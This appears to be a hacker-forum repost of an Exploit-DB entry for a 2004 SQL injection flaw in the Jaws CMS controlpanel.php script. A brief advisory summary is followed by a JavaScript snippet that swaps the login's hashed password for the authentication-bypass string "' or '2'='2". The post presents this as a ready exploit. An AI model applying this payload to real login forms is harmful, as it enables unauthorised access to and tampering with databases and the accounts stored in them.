Exploit Jaws 0.2/0.3/0.4 - 'ControlPanel.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24334
Проверка EDB
  1. Пройдено
Автор
FERNANDO QUINTERO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-2067
Дата публикации
2004-07-29
Jaws 0.2/0.3/0.4 - 'ControlPanel.php' SQL Injection
Код:
source: https://www.securityfocus.com/bid/10826/info

JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query.

Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database.

<script type="text/javascript">

function crypt_form(form) {
var new_password = calcMD5(form.password.value);
form.crypted_password.value = "' or '2'='2";
form.password.value = "";
return true;
}
</script>
 
Источник
www.exploit-db.com

Похожие темы